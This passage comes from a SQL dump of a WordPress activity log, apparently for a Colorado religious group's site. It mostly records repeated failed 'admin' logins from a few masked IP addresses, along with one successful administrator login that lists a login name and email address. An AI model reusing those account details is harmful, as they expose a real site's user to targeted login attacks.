8328,'server_http_user_agent','Mozilla/5.0'),(227867,38328,'_message_key','user_unknown_login_failed'),(227868,38328,'_server_remote_addr','20.168.9.x'),(227869,38329,'failed_username','admin'),(227870,38329,'server_http_user_agent','Mozilla/5.0'),(227871,38329,'_message_key','user_unknown_login_failed'),(227872,38329,'_server_remote_addr','45.136.118.x'),(227873,38330,'failed_username','admin'),(227874,38330,'server_http_user_agent','Mozilla/5.0'),(227875,38330,'_message_key','user_unknown_login_failed'),(227876,38330,'_server_remote_addr','20.169.51.x'),(227877,38331,'failed_username','admin'),(227878,38331,'server_http_user_agent','Mozilla/5.0'),(227879,38331,'_message_key','user_unknown_login_failed'),(227880,38331,'_server_remote_addr','13.51.201.x'),(227881,38332,'failed_username','admin'),(227882,38332,'server_http_user_agent','Mozilla/5.0'),(227883,38332,'_message_key','user_unknown_login_failed'),(227884,38332,'_server_remote_addr','45.136.118.x'),(227885,38333,'failed_username','admin'),(227886,38333,'server_http_user_agent','Mozilla/5.0'),(227887,38333,'_message_key','user_unknown_login_failed'),(227888,38333,'_server_remote_addr','20.169.51.x'),(227889,38334,'failed_username','admin'),(227890,38334,'server_http_user_agent','Mozilla/5.0'),(227891,38334,'_message_key','user_unknown_login_failed'),(227892,38334,'_server_remote_addr','20.168.9.x'),(227893,38335,'failed_username','admin'),(227894,38335,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(227895,38335,'_message_key','user_unknown_login_failed'),(227896,38335,'_xmlrpc_request','true'),(227897,38335,'_server_remote_addr','20.168.0.x'),(227898,38336,'failed_username','admin'),(227899,38336,'server_http_user_agent','Mozilla/5.0'),(227900,38336,'_message_key','user_unknown_login_failed'),(227901,38336,'_server_remote_addr','45.136.118.x'),(227902,38337,'failed_username','admin'),(227903,38337,'server_http_user_agent','Mozilla/5.0'),(227904,38337,'_message_key','user_unknown_login_failed'),(227905,38337,'_server_remote_addr','20.169.51.x'),(227906,38338,'failed_username','admin'),(227907,38338,'server_http_user_agent','Mozilla/5.0'),(227908,38338,'_message_key','user_unknown_login_failed'),(227909,38338,'_server_remote_addr','45.136.118.x'),(227910,38339,'failed_username','admin'),(227911,38339,'server_http_user_agent','Mozilla/5.0'),(227912,38339,'_message_key','user_unknown_login_failed'),(227913,38339,'_server_remote_addr','20.169.51.x'),(227914,38340,'failed_username','admin'),(227915,38340,'server_http_user_agent','Mozilla/5.0'),(227916,38340,'_message_key','user_unknown_login_failed'),(227917,38340,'_server_remote_addr','20.168.9.x'),(227918,38341,'failed_username','admin'),(227919,38341,'server_http_user_agent','Mozilla/5.0'),(227920,38341,'_message_key','user_unknown_login_failed'),(227921,38341,'_server_remote_addr','45.136.118.x'),(227922,38342,'failed_username','admin'),(227923,38342,'server_http_user_agent','Mozilla/5.0'),(227924,38342,'_message_key','user_unknown_login_failed'),(227925,38342,'_server_remote_addr','20.169.51.x'),(227926,38343,'failed_username','admin'),(227927,38343,'server_http_user_agent','Mozilla/5.0'),(227928,38343,'_message_key','user_unknown_login_failed'),(227929,38343,'_server_remote_addr','45.136.118.x'),(227930,38344,'failed_username','admin'),(227931,38344,'server_http_user_agent','Mozilla/5.0'),(227932,38344,'_message_key','user_unknown_login_failed'),(227933,38344,'_server_remote_addr','20.169.51.x'),(227934,38345,'failed_username','admin'),(227935,38345,'server_http_user_agent','Mozilla/5.0'),(227936,38345,'_message_key','user_unknown_login_failed'),(227937,38345,'_server_remote_addr','20.168.9.x'),(227938,38346,'failed_username','admin'),(227939,38346,'server_http_user_agent','Mozilla/5.0'),(227940,38346,'_message_key','user_unknown_login_failed'),(227941,38346,'_server_remote_addr','45.136.118.x'),(227942,38347,'failed_username','admin'),(227943,38347,'server_http_user_agent','Mozilla/5.0'),(227944,38347,'_message_key','user_unknown_login_failed'),(227945,38347,'_server_remote_addr','20.169.51.x'),(227946,38348,'failed_username','admin'),(227947,38348,'server_http_user_agent','Mozilla/5.0'),(227948,38348,'_message_key','user_unknown_login_failed'),(227949,38348,'_server_remote_addr','45.136.118.x'),(227950,38349,'failed_username','admin'),(227951,38349,'server_http_user_agent','Mozilla/5.0'),(227952,38349,'_message_key','user_unknown_login_failed'),(227953,38349,'_server_remote_addr','20.168.9.x'),(227954,38350,'failed_username','admin'),(227955,38350,'server_http_user_agent','Mozilla/5.0'),(227956,38350,'_message_key','user_unknown_login_failed'),(227957,38350,'_server_remote_addr','20.169.51.x'),(227958,38351,'failed_username','admin'),(227959,38351,'server_http_user_agent','Mozilla/5.0'),(227960,38351,'_message_key','user_unknown_login_failed'),(227961,38351,'_server_remote_addr','45.136.118.x'),(227962,38352,'failed_username','admin'),(227963,38352,'server_http_user_agent','Mozilla/5.0'),(227964,38352,'_message_key','user_unknown_login_failed'),(227965,38352,'_server_remote_addr','13.51.201.x'),(227966,38353,'failed_username','admin'),(227967,38353,'server_http_user_agent','Mozilla/5.0'),(227968,38353,'_message_key','user_unknown_login_failed'),(227969,38353,'_server_remote_addr','20.169.51.x'),(227970,38354,'failed_username','admin'),(227971,38354,'server_http_user_agent','Mozilla/5.0'),(227972,38354,'_message_key','user_unknown_login_failed'),(227973,38354,'_server_remote_addr','45.136.118.x'),(227974,38355,'failed_username','admin'),(227975,38355,'server_http_user_agent','Mozilla/5.0'),(227976,38355,'_message_key','user_unknown_login_failed'),(227977,38355,'_server_remote_addr','20.168.9.x'),(227978,38356,'failed_username','admin'),(227979,38356,'server_http_user_agent','Mozilla/5.0'),(227980,38356,'_message_key','user_unknown_login_failed'),(227981,38356,'_server_remote_addr','20.169.51.x'),(227982,38357,'failed_username','admin'),(227983,38357,'server_http_user_agent','Mozilla/5.0'),(227984,38357,'_message_key','user_unknown_login_failed'),(227985,38357,'_server_remote_addr','45.136.118.x'),(227986,38358,'failed_username','admin'),(227987,38358,'server_http_user_agent','Mozilla/5.0'),(227988,38358,'_message_key','user_unknown_login_failed'),(227989,38358,'_server_remote_addr','20.169.51.x'),(227990,38359,'failed_username','admin'),(227991,38359,'server_http_user_agent','Mozilla/5.0'),(227992,38359,'_message_key','user_unknown_login_failed'),(227993,38359,'_server_remote_addr','45.136.118.x'),(227994,38360,'failed_username','admin'),(227995,38360,'server_http_user_agent','Mozilla/5.0'),(227996,38360,'_message_key','user_unknown_login_failed'),(227997,38360,'_server_remote_addr','20.168.0.x'),(227998,38361,'failed_username','admin'),(227999,38361,'server_http_user_agent','Mozilla/5.0'),(228000,38361,'_message_key','user_unknown_login_failed'),(228001,38361,'_server_remote_addr','20.168.9.x'),(228002,38362,'failed_username','admin'),(228003,38362,'server_http_user_agent','Mozilla/5.0'),(228004,38362,'_message_key','user_unknown_login_failed'),(228005,38362,'_server_remote_addr','45.136.118.x'),(228006,38363,'failed_username','admin'),(228007,38363,'server_http_user_agent','Mozilla/5.0'),(228008,38363,'_message_key','user_unknown_login_failed'),(228009,38363,'_server_remote_addr','20.169.51.x'),(228010,38364,'failed_username','admin'),(228011,38364,'server_http_user_agent','Mozilla/5.0'),(228012,38364,'_message_key','user_unknown_login_failed'),(228013,38364,'_server_remote_addr','20.168.0.x'),(228014,38365,'failed_username','admin'),(228015,38365,'server_http_user_agent','Mozilla/5.0'),(228016,38365,'_message_key','user_unknown_login_failed'),(228017,38365,'_server_remote_addr','45.136.118.x'),(228018,38366,'failed_username','admin'),(228019,38366,'server_http_user_agent','Mozilla/5.0'),(228020,38366,'_message_key','user_unknown_login_failed'),(228021,38366,'_server_remote_addr','20.169.51.x'),(228022,38367,'failed_username','admin'),(228023,38367,'server_http_user_agent','Mozilla/5.0'),(228024,38367,'_message_key','user_unknown_login_failed'),(228025,38367,'_server_remote_addr','20.168.0.x'),(228026,38368,'failed_username','admin'),(228027,38368,'server_http_user_agent','Mozilla/5.0'),(228028,38368,'_message_key','user_unknown_login_failed'),(228029,38368,'_server_remote_addr','20.168.9.x'),(228030,38369,'failed_username','admin'),(228031,38369,'server_http_user_agent','Mozilla/5.0'),(228032,38369,'_message_key','user_unknown_login_failed'),(228033,38369,'_server_remote_addr','45.136.118.x'),(228034,38370,'failed_username','admin'),(228035,38370,'server_http_user_agent','Mozilla/5.0'),(228036,38370,'_message_key','user_unknown_login_failed'),(228037,38370,'_server_remote_addr','20.168.0.x'),(228038,38371,'failed_username','admin'),(228039,38371,'server_http_user_agent','Mozilla/5.0'),(228040,38371,'_message_key','user_unknown_login_failed'),(228041,38371,'_server_remote_addr','20.169.51.x'),(228042,38372,'failed_username','admin'),(228043,38372,'server_http_user_agent','Mozilla/5.0'),(228044,38372,'_message_key','user_unknown_login_failed'),(228045,38372,'_server_remote_addr','45.136.118.x'),(228046,38373,'failed_username','admin'),(228047,38373,'server_http_user_agent','Mozilla/5.0'),(228048,38373,'_message_key','user_unknown_login_failed'),(228049,38373,'_server_remote_addr','20.168.0.x'),(228050,38374,'failed_username','admin'),(228051,38374,'server_http_user_agent','Mozilla/5.0'),(228052,38374,'_message_key','user_unknown_login_failed'),(228053,38374,'_server_remote_addr','20.169.51.x'),(228054,38375,'failed_username','admin'),(228055,38375,'server_http_user_agent','Mozilla/5.0'),(228056,38375,'_message_key','user_unknown_login_failed'),(228057,38375,'_server_remote_addr','20.168.9.x'),(228058,38376,'failed_username','admin'),(228059,38376,'server_http_user_agent','Mozilla/5.0'),(228060,38376,'_message_key','user_unknown_login_failed'),(228061,38376,'_server_remote_addr','13.51.201.x'),(228062,38377,'failed_username','admin'),(228063,38377,'server_http_user_agent','Mozilla/5.0'),(228064,38377,'_message_key','user_unknown_login_failed'),(228065,38377,'_server_remote_addr','45.136.118.x'),(228066,38378,'failed_username','admin'),(228067,38378,'server_http_user_agent','Mozilla/5.0'),(228068,38378,'_message_key','user_unknown_login_failed'),(228069,38378,'_server_remote_addr','20.169.51.x'),(228070,38379,'failed_username','admin'),(228071,38379,'server_http_user_agent','Mozilla/5.0'),(228072,38379,'_message_key','user_unknown_login_failed'),(228073,38379,'_server_remote_addr','20.168.0.x'),(228074,38380,'failed_username','admin'),(228075,38380,'server_http_user_agent','Mozilla/5.0'),(228076,38380,'_message_key','user_unknown_login_failed'),(228077,38380,'_server_remote_addr','45.136.118.x'),(228078,38381,'failed_username','admin'),(228079,38381,'server_http_user_agent','Mozilla/5.0'),(228080,38381,'_message_key','user_unknown_login_failed'),(228081,38381,'_server_remote_addr','20.169.51.x'),(228082,38382,'failed_username','admin'),(228083,38382,'server_http_user_agent','Mozilla/5.0'),(228084,38382,'_message_key','user_unknown_login_failed'),(228085,38382,'_server_remote_addr','20.168.0.x'),(228086,38383,'failed_username','admin'),(228087,38383,'server_http_user_agent','Mozilla/5.0'),(228088,38383,'_message_key','user_unknown_login_failed'),(228089,38383,'_server_remote_addr','20.168.9.x'),(228090,38384,'failed_username','admin'),(228091,38384,'server_http_user_agent','Mozilla/5.0'),(228092,38384,'_message_key','user_unknown_login_failed'),(228093,38384,'_server_remote_addr','45.136.118.x'),(228094,38385,'failed_username','admin'),(228095,38385,'server_http_user_agent','Mozilla/5.0'),(228096,38385,'_message_key','user_unknown_login_failed'),(228097,38385,'_server_remote_addr','20.168.0.x'),(228098,38386,'failed_username','admin'),(228099,38386,'server_http_user_agent','Mozilla/5.0'),(228100,38386,'_message_key','user_unknown_login_failed'),(228101,38386,'_server_remote_addr','45.136.118.x'),(228102,38387,'failed_username','admin'),(228103,38387,'server_http_user_agent','Mozilla/5.0'),(228104,38387,'_message_key','user_unknown_login_failed'),(228105,38387,'_server_remote_addr','20.168.0.x'),(228106,38388,'failed_username','admin'),(228107,38388,'server_http_user_agent','Mozilla/5.0'),(228108,38388,'_message_key','user_unknown_login_failed'),(228109,38388,'_server_remote_addr','20.168.9.x'),(228110,38389,'failed_username','admin'),(228111,38389,'server_http_user_agent','Mozilla/5.0'),(228112,38389,'_message_key','user_unknown_login_failed'),(228113,38389,'_server_remote_addr','45.136.118.x'),(228114,38390,'failed_username','admin'),(228115,38390,'server_http_user_agent','Mozilla/5.0'),(228116,38390,'_message_key','user_unknown_login_failed'),(228117,38390,'_server_remote_addr','20.168.0.x'),(228118,38391,'failed_username','admin'),(228119,38391,'server_http_user_agent','Mozilla/5.0'),(228120,38391,'_message_key','user_unknown_login_failed'),(228121,38391,'_server_remote_addr','45.136.118.x'),(228122,38392,'failed_username','admin'),(228123,38392,'server_http_user_agent','Mozilla/5.0'),(228124,38392,'_message_key','user_unknown_login_failed'),(228125,38392,'_server_remote_addr','20.168.9.x'),(228126,38393,'failed_username','admin'),(228127,38393,'server_http_user_agent','Mozilla/5.0'),(228128,38393,'_message_key','user_unknown_login_failed'),(228129,38393,'_server_remote_addr','20.168.0.x'),(228130,38394,'failed_username','admin'),(228131,38394,'server_http_user_agent','Mozilla/5.0'),(228132,38394,'_message_key','user_unknown_login_failed'),(228133,38394,'_server_remote_addr','45.136.118.x'),(228134,38395,'failed_username','admin'),(228135,38395,'server_http_user_agent','Mozilla/5.0'),(228136,38395,'_message_key','user_unknown_login_failed'),(228137,38395,'_server_remote_addr','20.168.0.x'),(228138,38396,'failed_username','admin'),(228139,38396,'server_http_user_agent','Mozilla/5.0'),(228140,38396,'_message_key','user_unknown_login_failed'),(228141,38396,'_server_remote_addr','45.136.118.x'),(228142,38397,'failed_username','admin'),(228143,38397,'server_http_user_agent','Mozilla/5.0'),(228144,38397,'_message_key','user_unknown_login_failed'),(228145,38397,'_server_remote_addr','13.51.201.x'),(228146,38398,'failed_username','admin'),(228147,38398,'server_http_user_agent','Mozilla/5.0'),(228148,38398,'_message_key','user_unknown_login_failed'),(228149,38398,'_server_remote_addr','20.168.9.x'),(228150,38399,'failed_username','admin'),(228151,38399,'server_http_user_agent','Mozilla/5.0'),(228152,38399,'_message_key','user_unknown_login_failed'),(228153,38399,'_server_remote_addr','20.168.0.x'),(228154,38400,'failed_username','admin'),(228155,38400,'server_http_user_agent','Mozilla/5.0'),(228156,38400,'_message_key','user_unknown_login_failed'),(228157,38400,'_server_remote_addr','45.136.118.x'),(228158,38401,'failed_username','wordpress_administrator'),(228159,38401,'server_http_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),(228160,38401,'_message_key','user_unknown_login_failed'),(228161,38401,'_server_remote_addr','209.141.46.x'),(228162,38402,'failed_username','admin'),(228163,38402,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(228164,38402,'_message_key','user_unknown_login_failed'),(228165,38402,'_xmlrpc_request','true'),(228166,38402,'_server_remote_addr','20.169.51.x'),(228167,38403,'failed_username','admin'),(228168,38403,'server_http_user_agent','Mozilla/5.0'),(228169,38403,'_message_key','user_unknown_login_failed'),(228170,38403,'_server_remote_addr','45.136.118.x'),(228171,38404,'failed_username','admin'),(228172,38404,'server_http_user_agent','Mozilla/5.0'),(228173,38404,'_message_key','user_unknown_login_failed'),(228174,38404,'_server_remote_addr','20.168.0.x'),(228175,38405,'failed_username','admin'),(228176,38405,'server_http_user_agent','Mozilla/5.0'),(228177,38405,'_message_key','user_unknown_login_failed'),(228178,38405,'_server_remote_addr','45.136.118.x'),(228179,38406,'failed_username','admin'),(228180,38406,'server_http_user_agent','Mozilla/5.0'),(228181,38406,'_message_key','user_unknown_login_failed'),(228182,38406,'_server_remote_addr','20.168.9.x'),(228183,38407,'failed_username','admin'),(228184,38407,'server_http_user_agent','Mozilla/5.0'),(228185,38407,'_message_key','user_unknown_login_failed'),(228186,38407,'_server_remote_addr','20.168.0.x'),(228187,38408,'failed_username','admin'),(228188,38408,'server_http_user_agent','Mozilla/5.0'),(228189,38408,'_message_key','user_unknown_login_failed'),(228190,38408,'_server_remote_addr','45.136.118.x'),(228191,38409,'failed_username','admin'),(228192,38409,'server_http_user_agent','Mozilla/5.0'),(228193,38409,'_message_key','user_unknown_login_failed'),(228194,38409,'_server_remote_addr','20.168.0.x'),(228195,38410,'failed_username','admin'),(228196,38410,'server_http_user_agent','Mozilla/5.0'),(228197,38410,'_message_key','user_unknown_login_failed'),(228198,38410,'_server_remote_addr','45.136.118.x'),(228199,38411,'failed_username','admin'),(228200,38411,'server_http_user_agent','Mozilla/5.0'),(228201,38411,'_message_key','user_unknown_login_failed'),(228202,38411,'_server_remote_addr','20.168.9.x'),(228203,38412,'failed_username','admin'),(228204,38412,'server_http_user_agent','Mozilla/5.0'),(228205,38412,'_message_key','user_unknown_login_failed'),(228206,38412,'_server_remote_addr','20.168.0.x'),(228207,38413,'failed_username','admin'),(228208,38413,'server_http_user_agent','Mozilla/5.0'),(228209,38413,'_message_key','user_unknown_login_failed'),(228210,38413,'_server_remote_addr','45.136.118.x'),(228211,38414,'failed_username','admin'),(228212,38414,'server_http_user_agent','Mozilla/5.0'),(228213,38414,'_message_key','user_unknown_login_failed'),(228214,38414,'_server_remote_addr','20.168.0.x'),(228215,38415,'failed_username','admin'),(228216,38415,'server_http_user_agent','Mozilla/5.0'),(228217,38415,'_message_key','user_unknown_login_failed'),(228218,38415,'_server_remote_addr','45.136.118.x'),(228219,38416,'failed_username','admin'),(228220,38416,'server_http_user_agent','Mozilla/5.0'),(228221,38416,'_message_key','user_unknown_login_failed'),(228222,38416,'_server_remote_addr','20.168.9.x'),(228223,38417,'failed_username','admin'),(228224,38417,'server_http_user_agent','Mozilla/5.0'),(228225,38417,'_message_key','user_unknown_login_failed'),(228226,38417,'_server_remote_addr','20.168.0.x'),(228227,38418,'failed_username','admin'),(228228,38418,'server_http_user_agent','Mozilla/5.0'),(228229,38418,'_message_key','user_unknown_login_failed'),(228230,38418,'_server_remote_addr','13.51.201.x'),(228231,38419,'failed_username','admin'),(228232,38419,'server_http_user_agent','Mozilla/5.0'),(228233,38419,'_message_key','user_unknown_login_failed'),(228234,38419,'_server_remote_addr','45.136.118.x'),(228235,38420,'post_id','269215'),(228236,38420,'post_type','nf_sub'),(228237,38420,'post_title',''),(228238,38420,'_message_key','post_updated'),(228239,38420,'_server_remote_addr','172.59.227.x'),(228240,38420,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(228241,38421,'failed_username','admin'),(228242,38421,'server_http_user_agent','Mozilla/5.0'),(228243,38421,'_message_key','user_unknown_login_failed'),(228244,38421,'_server_remote_addr','20.168.0.x'),(228245,38422,'failed_username','admin'),(228246,38422,'server_http_user_agent','Mozilla/5.0'),(228247,38422,'_message_key','user_unknown_login_failed'),(228248,38422,'_server_remote_addr','45.136.118.x'),(228249,38423,'failed_username','admin'),(228250,38423,'server_http_user_agent','Mozilla/5.0'),(228251,38423,'_message_key','user_unknown_login_failed'),(228252,38423,'_server_remote_addr','20.168.9.x'),(228253,38424,'failed_username','admin'),(228254,38424,'server_http_user_agent','Mozilla/5.0'),(228255,38424,'_message_key','user_unknown_login_failed'),(228256,38424,'_server_remote_addr','20.168.0.x'),(228257,38425,'failed_username','admin'),(228258,38425,'server_http_user_agent','Mozilla/5.0'),(228259,38425,'_message_key','user_unknown_login_failed'),(228260,38425,'_server_remote_addr','45.136.118.x'),(228261,38426,'failed_username','admin'),(228262,38426,'server_http_user_agent','Mozilla/5.0'),(228263,38426,'_message_key','user_unknown_login_failed'),(228264,38426,'_server_remote_addr','20.168.0.x'),(228265,38427,'failed_username','admin'),(228266,38427,'server_http_user_agent','Mozilla/5.0'),(228267,38427,'_message_key','user_unknown_login_failed'),(228268,38427,'_server_remote_addr','45.136.118.x'),(228269,38428,'failed_username','admin'),(228270,38428,'server_http_user_agent','Mozilla/5.0'),(228271,38428,'_message_key','user_unknown_login_failed'),(228272,38428,'_server_remote_addr','20.168.9.x'),(228273,38429,'failed_username','admin'),(228274,38429,'server_http_user_agent','Mozilla/5.0'),(228275,38429,'_message_key','user_unknown_login_failed'),(228276,38429,'_server_remote_addr','20.168.0.x'),(228277,38430,'failed_username','admin'),(228278,38430,'server_http_user_agent','Mozilla/5.0'),(228279,38430,'_message_key','user_unknown_login_failed'),(228280,38430,'_server_remote_addr','45.136.118.x'),(228281,38431,'failed_username','admin'),(228282,38431,'server_http_user_agent','Mozilla/5.0'),(228283,38431,'_message_key','user_unknown_login_failed'),(228284,38431,'_server_remote_addr','45.136.118.x'),(228285,38432,'failed_username','admin'),(228286,38432,'server_http_user_agent','Mozilla/5.0'),(228287,38432,'_message_key','user_unknown_login_failed'),(228288,38432,'_server_remote_addr','20.168.9.x'),(228289,38433,'failed_username','admin'),(228290,38433,'server_http_user_agent','Mozilla/5.0'),(228291,38433,'_message_key','user_unknown_login_failed'),(228292,38433,'_server_remote_addr','45.136.118.x'),(228293,38434,'failed_username','admin'),(228294,38434,'server_http_user_agent','Mozilla/5.0'),(228295,38434,'_message_key','user_unknown_login_failed'),(228296,38434,'_server_remote_addr','45.136.118.x'),(228297,38435,'failed_username','admin'),(228298,38435,'server_http_user_agent','Mozilla/5.0'),(228299,38435,'_message_key','user_unknown_login_failed'),(228300,38435,'_server_remote_addr','13.51.201.x'),(228301,38436,'user_id','2'),(228302,38436,'user_email','nada@zipnadanot.org'),(228303,38436,'user_login','S8zhaBda'),(228304,38436,'_user_id','2'),(228305,38436,'_user_login','S8zhaBda'),(228306,38436,'_user_email','nada@zipnadanot.org'),(228307,38436,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(228308,38436,'_message_key','user_logged_in'),(228309,38436,'_server_remote_addr','76.130.120.x'),(228310,38436,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(228311,38437,'_user_id','2'),(228312,38437,'_user_login','S8zhaBda'),(228313,38437,'_user_email','nada@zipnadanot.org'),(228314,38437,'_message_key','user_logged_out'),(228315,38437,'_server_remote_addr','76.130.120.x'),(228316,38437,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(228317,38438,'failed_username','admin'),(228318,38438,'server_http_user_agent','Mozilla/5.0'),(228319,38438,'_message_key','user_unknown_login_failed'),(228320,38438,'_server_remote_addr','20.168.9.x'),(228321,38439,'failed_username','admin'),(228322,38439,'server_http_user_agent','Mozilla/5.0'),(228323,38439,'_message_key','user_unknown_login_failed'),(228324,38439,'_server_remote_addr','45.136.118.x'),(228325,38440,'failed_username','admin'),(228326,38440,'server_http_user_agent','Mozilla/5.0'),(228327,38440,'_message_key','user_unknown_login_failed'),(228328,38440,'_server_remote_addr','20.163.25.x'),(228329,38441,'failed_username','admin'),(228330,38441,'server_http_user_agent','Mozilla/5.0'),(228331,38441,'_message_key','user_unknown_login_failed'),(228332,38441,'_server_remote_addr','45.136.118.x'),(228333,38442,'failed_username','admin'),(228334,38442,'server_http_user_agent','Mozilla/5.0'),(228335,38442,'_message_key','user_unknown_login_failed'),(228336,38442,'_server_remote_addr','20.168.9.x'),(228337,38443,'failed_username','admin'),(228338,38443,'server_http_user_agent','Mozilla/5.0'),(228339,38443,'_message_key','user_unknown_login_failed'),(228340,38443,'_server_remote_addr','20.163.25.x'),(228341,38444,'failed_username','admin'),(228342,38444,'server_http_user_agent','Mozilla/5.0'),(228343,38444,'_message_key','user_unknown_login_failed'),(228344,38444,'_server_remote_addr','45.136.118.x'),(228345,38445,'failed_username','admin'),(228346,38445,'server_http_user_agent','Mozilla/5.0'),(228347,38445,'_message_key','user_unknown_login_failed'),(228348,38445,'_server_remote_addr','45.136.118.x'),(228349,38446,'failed_username','admin'),(228350,38446,'server_http_user_agent','Mozilla/5.0'),(228351,38446,'_message_key','user_unknown_login_failed'),(228352,38446,'_server_remote_addr','20.163.25.x'),(228353,38447,'failed_username','admin'),(228354,38447,'server_http_user_agent','Mozilla/5.0'),(228355,38447,'_message_key','user_unknown_login_failed'),(228356,38447,'_server_remote_addr','20.168.9.x'),(228357,38448,'failed_username','admin'),(228358,38448,'server_http_user_agent','Mozilla/5.0'),(228359,38448,'_message_key','user_unknown_login_failed'),(228360,38448,'_server_remote_addr','45.136.118.x'),(228361,38449,'failed_username','admin'),(228362,38449,'server_http_user_agent','Mozilla/5.0'),(228363,38449,'_message_key','user_unknown_login_failed'),(228364,38449,'_server_remote_addr','20.163.25.x'),(228365,38450,'failed_username','admin'),(228366,38450,'server_http_user_agent','Mozilla/5.0'),(228367,38450,'_message_key','user_unknown_login_failed'),(228368,38450,'_server_remote_addr','45.136.118.x'),(228369,38451,'failed_username','admin'),(228370,38451,'server_http_user_agent','Mozilla/5.0'),(228371,38451,'_message_key','user_unknown_login_failed'),(228372,38451,'_server_remote_addr','20.168.9.x'),(228373,38452,'failed_username','admin'),(228374,38452,'server_http_user_agent','Mozilla/5.0'),(228375,38452,'_message_key','user_unknown_login_failed'),(228376,38452,'_server_remote_addr','45.136.118.x'),(228377,38453,'failed_username','admin'),(228378,38453,'server_http_user_agent','Mozilla/5.0'),(228379,38453,'_message_key','user_unknown_login_failed'),(228380,38453,'_server_remote_addr','20.163.25.x'),(228381,38454,'failed_username','admin'),(228382,38454,'server_http_user_agent','Mozilla/5.0'),(228383,38454,'_message_key','user_unknown_login_failed'),(228384,38454,'_server_remote_addr','13.51.201.x'),(228385,38455,'failed_username','admin'),(228386,38455,'server_http_user_agent','Mozilla/5.0'),(228387,38455,'_message_key','user_unknown_login_failed'),(228388,38455,'_server_remote_addr','45.136.118.x'),(228389,38456,'failed_username','admin'),(228390,38456,'server_http_user_agent','Mozilla/5.0'),(228391,38456,'_message_key','user_unknown_login_failed'),(228392,38456,'_server_remote_addr','20.169.51.x'),(228393,38457,'failed_username','admin'),(228394,38457,'server_http_user_agent','Mozilla/5.0'),(228395,38457,'_message_key','user_unknown_login_failed'),(228396,38457,'_server_remote_addr','20.168.9.x'),(228397,38458,'failed_username','admin'),(228398,38458,'server_http_user_agent','Mozilla/5.0'),(228399,38458,'_message_key','user_unknown_login_failed'),(228400,38458,'_server_remote_addr','45.136.118.x'),(228401,38459,'failed_username','admin'),(228402,38459,'server_http_user_agent','Mozilla/5.0'),(228403,38459,'_message_key','user_unknown_login_failed'),(228404,38459,'_server_remote_addr','20.163.25.x'),(228405,38460,'failed_username','admin'),(228406,38460,'server_http_user_agent','Mozilla/5.0'),(228407,38460,'_message_key','user_unknown_login_failed'),(228408,38460,'_server_remote_addr','20.169.51.x'),(228409,38461,'failed_username','admin'),(228410,38461,'server_http_user_agent','Mozilla/5.0'),(228411,38461,'_message_key','user_unknown_login_failed'),(228412,38461,'_server_remote_addr','45.136.118.x'),(228413,38462,'failed_username','admin'),(228414,38462,'server_http_user_agent','Mozilla/5.0'),(228415,38462,'_message_key','user_unknown_login_failed'),(228416,38462,'_server_remote_addr','20.169.51.x'),(228417,38463,'failed_username','admin'),(228418,38463,'server_http_user_agent','Mozilla/5.0'),(228419,38463,'_message_key','user_unknown_login_failed'),(228420,38463,'_server_remote_addr','20.168.9.x'),(228421,38464,'failed_username','admin'),(228422,38464,'server_http_user_agent','Mozilla/5.0'),(228423,38464,'_message_key','user_unknown_login_failed'),(228424,38464,'_server_remote_addr','20.163.25.x'),(228425,38465,'failed_username','admin'),(228426,38465,'server_http_user_agent','Mozilla/5.0'),(228427,38465,'_message_key','user_unknown_login_failed'),(228428,38465,'_server_remote_addr','45.136.118.x'),(228429,38466,'failed_username','admin'),(228430,38466,'server_http_user_agent','Mozilla/5.0'),(228431,38466,'_message_key','user_unknown_login_failed'),(228432,38466,'_server_remote_addr','20.163.25.x'),(228433,38467,'failed_username','admin'),(228434,38467,'server_http_user_agent','Mozilla/5.0'),(228435,38467,'_message_key','user_unknown_login_failed'),(228436,38467,'_server_remote_addr','20.169.51.x'),(228437,38468,'failed_username','admin'),(228438,38468,'server_http_user_agent','Mozilla/5.0'),(228439,38468,'_message_key','user_unknown_login_failed'),(228440,38468,'_server_remote_addr','45.136.118.x'),(228441,38469,'failed_username','admin'),(228442,38469,'server_http_user_agent','Mozilla/5.0'),(228443,38469,'_message_key','user_unknown_login_failed'),(228444,38469,'_server_remote_addr','20.163.25.x'),(228445,38470,'failed_username','admin'),(228446,38470,'server_http_user_agent','Mozilla/5.0'),(228447,38470,'_message_key','user_unknown_login_failed'),(228448,38470,'_server_remote_addr','20.168.9.x'),(228449,38471,'failed_username','admin'),(228450,38471,'server_http_user_agent','Mozilla/5.0'),(228451,38471,'_message_key','user_unknown_login_failed'),(228452,38471,'_server_remote_addr','45.136.118.x'),(228453,38472,'failed_username','admin'),(228454,38472,'server_http_user_agent','Mozilla/5.0'),(228455,38472,'_message_key','user_unknown_login_failed'),(228456,38472,'_server_remote_addr','20.169.51.x'),(228457,38473,'failed_username','admin'),(228458,38473,'server_http_user_agent','Mozilla/5.0'),(228459,38473,'_message_key','user_unknown_login_failed'),(228460,38473,'_server_remote_addr','20.163.25.x'),(228461,38474,'failed_username','admin'),(228462,38474,'server_http_user_agent','Mozilla/5.0'),(228463,38474,'_message_key','user_unknown_login_failed'),(228464,38474,'_server_remote_addr','45.136.118.x'),(228465,38475,'failed_username','admin'),(228466,38475,'server_http_user_agent','Mozilla/5.0'),(228467,38475,'_message_key','user_unknown_login_failed'),(228468,38475,'_server_remote_addr','20.169.51.x'),(228469,38476,'failed_username','admin'),(228470,38476,'server_http_user_agent','Mozilla/5.0'),(228471,38476,'_message_key','user_unknown_login_failed'),(228472,38476,'_server_remote_addr','20.163.25.x'),(228473,38477,'failed_username','admin'),(228474,38477,'server_http_user_agent','Mozilla/5.0'),(228475,38477,'_message_key','user_unknown_login_failed'),(228476,38477,'_server_remote_addr','45.136.118.x'),(228477,38478,'failed_us